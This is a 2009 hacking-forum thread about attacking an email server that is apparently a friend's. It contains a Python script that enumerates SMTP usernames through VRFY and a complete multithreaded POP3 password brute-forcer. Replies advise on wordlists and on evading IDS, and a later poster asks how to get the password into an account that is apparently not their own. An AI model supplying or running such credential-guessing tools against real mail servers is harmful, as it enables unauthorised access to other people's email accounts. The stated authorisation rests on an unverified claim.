unixpro Posted March 31, 2009 Share Posted March 31, 2009 I was wondering if anyone has done , or knows were to point me in the right direction. My mate has setup a email server @ his house and wants me to test it eg metaspoilt so forth , but i have never done brute force email attacks. I guess you use a dictonary attack , but how do you get a list of email accounts on that server ? Cheers Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted March 31, 2009 Share Posted March 31, 2009 how do you get a list of email accounts on that server ? I guess you use a dictonary attack brute force Quote Link to comment Share on other sites More sharing options...
blk Posted March 31, 2009 Share Posted March 31, 2009 how do you get a list of email accounts on that server ? have a look at smtp enumeration techniques if the server allows VRFY you can brute force the email accounts. write a script that takes a list of names (joe,jim,jon) and then tags the domain to it (@blogs.com) then VRFY against the server What server is he using ? Quote Link to comment Share on other sites More sharing options...
gEEEk Posted April 1, 2009 Share Posted April 1, 2009 I think Brutus can conduct a bruteforce attack against POP3. Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things. Bruteforce - try every combination of a certain number of characters Dictionary - uses wordlists to try passwords I think there is an old python script called GooMail previously included in the BT2 suite which used some google parameters to filter out mail adresses based on a certain domain. Good luck! /gEEEk :) Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 1, 2009 Share Posted April 1, 2009 Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things. You are sorta right, IMO. Both of them are throwing shit at the wall to see what sticks so either way you are trying to brute force it, only with a dictionary you have a predefined set of words. Depending on what he is running as the POP3 server it shouldnt be that hard. Admin, HISNAME, CONTACT @whatever.com. A bruteforce attack is going to do some stupid shit and get picked up fairly quickly with a decent IDS. Go with a word list, and Python. Quote Link to comment Share on other sites More sharing options...
unixpro Posted April 2, 2009 Author Share Posted April 2, 2009 Yeah i tryed a python script , for dictionary attack to get usernames but i was un-successfull due to vrfy being disabled. i might try some other methods tonight i used this #!/usr/bin/python import socket import sys import fileinput if len(sys.argv) !=2: print "Usage: <inputfile>" sys.exit(0) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xx.xxx.xx.xxx',25)) banner=s.recv(1024) print banner for line in fileinput.input(): s.send('VRFY '+line) result=s.recv(1024) print result s.close() it worked but dam server had vrfy disabled , anyone know some other methods ? , otherwise ill try some brute force Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted April 2, 2009 Share Posted April 2, 2009 Have you scanned the host with nmap? Are there other services running? Here is your code #!usr/bin/python #Pop3 Brute Forcer #d3hydr8[at]gmail[dot]com import threading, time, random, sys, poplib from copy import copy if len(sys.argv) !=4: print "Usage: ./popbrute.py <server> <userlist> <wordlist>" sys.exit(1) try: users = open(sys.argv[2], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) try: pop = poplib.POP3(sys.argv[1]) welcome = pop.getwelcome() pop.quit() except (poplib.error_proto): welcome = "No Response" pass print "\n\t d3hydr8[at]gmail[dot]com popBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[1] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "Reloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() return value[0][:-1], users[0][:-1] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"*12 print "User:",user,"Password:",value pop = poplib.POP3(sys.argv[1]) pop.user(user) pop.pass_(value) print "\t\nLogin successful:",value, user print pop.stat() pop.quit() work.join() sys.exit(2) except (poplib.error_proto), msg: #print "An error occurred:", msg pass for i in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1) Quote Link to comment Share on other sites More sharing options...
tsaG Posted April 28, 2009 Share Posted April 28, 2009 Hi, I figured out how the Username is, now how do I get the Passwort to login into the Account? Bruteforce, but which Script/Programm? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.